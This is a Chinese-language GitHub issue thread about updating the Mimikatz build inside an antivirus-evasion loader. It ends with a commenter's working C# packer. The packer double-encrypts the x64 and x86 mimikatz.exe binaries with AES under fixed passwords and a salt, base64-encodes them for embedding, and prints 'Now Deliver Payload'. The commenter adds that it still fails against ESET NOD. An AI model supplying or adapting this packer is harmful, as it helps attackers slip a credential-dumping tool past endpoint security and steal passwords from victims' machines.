更新Mimikatz版本
wxlg1117 opened this issue · 4 comments
wxlg1117 commented
大佬能详细说说该怎么更新Mimikatz版本么?
另外发现个和你这个差不多的:
https://github.com/GhostPack/SafetyKatz
大佬也指点一下他这个具体怎么更新Mimikatz版本么?
Asteriska001 commented
楼上老哥研究出方法了吗qwq
wxlg1117 commented
没有啊啊啊
Asteriska001 commented
好吧,我这边也研究下,有成果了再交流qwq
SpenserCai commented
过不了nod还要研究一下
把mimikatz的x86和x64放到目录里
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace MimikatzBypass
{
class Program
{
static void Main(string[] args)
{
byte[] b = Misc.FileToByteArray(@"mimikatz.exe");
byte[] e = Misc.Encrypt(b, "password1");
byte[] ee = Misc.Encrypt(e, "password2");
string f = System.Convert.ToBase64String(ee);
File.WriteAllText(@"file.b64", f);
byte[] b1 = Misc.FileToByteArray(@"mimikatzx86.exe");
byte[] e1 = Misc.Encrypt(b1, "password1");
byte[] e2 = Misc.Encrypt(e1, "password2");
string f1 = System.Convert.ToBase64String(e2);
File.WriteAllText(@"filex86.b64", f1);
}
}
public class Misc
{
//Change This!
//private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
private static readonly byte[] SALT = new byte[] { 0x1f, 0xde, 0x9d, 0xae, 0xcb, 0xb4, 0xae, 0xe8, 0x8f, 0x4b, 0xab, 0xa7, 0x81, 0x96, 0x4c, 0xdc };
public static void Stage(string fileName, string Key, string outFile)
{
byte[] raw = FileToByteArray(fileName);
byte[] file = Encrypt(raw, Key);
FileStream fileStream = File.Create(outFile);
fileStream.Write(file, 0, file.Length);//Write stream to temp file
Console.WriteLine("File Ready, Now Deliver Payload");
}
public static byte[] FileToByteArray(string _FileName)
{
byte[] _Buffer = null;
System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
_Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
_FileStream.Close();
_FileStream.Dispose();
_BinaryReader.Close();
return _Buffer;
}
public static byte[] Encrypt(byte[] plain, string password)
{
MemoryStream memoryStream;
CryptoStream cryptoStream;
Rijndael rijndael = Rijndael.Create();
Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
rijndael.Key = pdb.GetBytes(32);
rijndael.IV = pdb.GetBytes(16);
memoryStream = new MemoryStream();
cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
cryptoStream.Write(plain, 0, plain.Length);
cryptoStream.Close();
return memoryStream.ToArray();
}
public static byte[] Decrypt(byte[] cipher, string password)
{
MemoryStream memoryStream;
CryptoStream cryptoStream;
Rijndael rijndael = Rijndael.Create();
Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
rijndael.Key = pdb.GetBytes(32);
rijndael.IV = pdb.GetBytes(16);
memoryStream = new MemoryStream();
cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
cryptoStream.Write(cipher, 0, cipher.Length);
cryptoStream.Close();
return memoryStream.ToArray();
}
public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
{
byte[] buffer = new byte[16 * 1024];
using (MemoryStream ms = new MemoryStream())
{
int read;
while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
{
ms.Write(buffer, 0, read);
}
return ms.ToArray();
}
}
}//End Misc Class
}
吧生成的代码放到那两行,然后对应的SALT改一下